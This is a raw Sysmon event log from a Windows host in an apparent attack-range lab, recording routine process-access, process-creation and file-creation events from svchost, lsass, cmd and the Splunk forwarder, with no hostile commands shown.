08:41:22.730{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001549Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.730{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001548Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.730{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001547Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.730{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001546Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.730{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001545Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.730{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001544Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.730{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001543Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.730{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001542Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.730{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16B2-5F84-3900-000000007F01}3772C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001541Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.730{5D479F2C-16B2-5F84-3700-000000007F01}37283732C:\Windows\system32\cmd.exe{5D479F2C-16B2-5F84-3900-000000007F01}3772C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001540Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.723{5D479F2C-16B2-5F84-3900-000000007F01}3772C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{5D479F2C-16B2-5F84-3700-000000007F01}3728C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvars 10341000x80000000000000001539Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.699{5D479F2C-16B2-5F84-3800-000000007F01}37363756C:\Windows\system32\conhost.exe{5D479F2C-16B2-5F84-3700-000000007F01}3728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001538Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.699{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16B2-5F84-3800-000000007F01}3736C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001537Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.699{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001536Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.699{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001535Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.699{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001534Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.699{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001533Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.699{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001532Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.699{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001531Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.699{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001530Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.699{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001529Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.699{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001528Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.699{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16B2-5F84-3700-000000007F01}3728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001527Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.699{5D479F2C-16B1-5F84-3000-000000007F01}26162460C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5D479F2C-16B2-5F84-3700-000000007F01}3728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2b15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001526Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.698{5D479F2C-16B2-5F84-3700-000000007F01}3728C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001525Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.621{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16B2-5F84-3600-000000007F01}3600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001524Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.621{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16B2-5F84-3600-000000007F01}3600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x80000000000000001523Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.590{5D479F2C-16B2-5F84-3600-000000007F01}3600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_54cw3eoy.s0f.ps12020-10-12 08:41:22.590 10341000x80000000000000001522Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 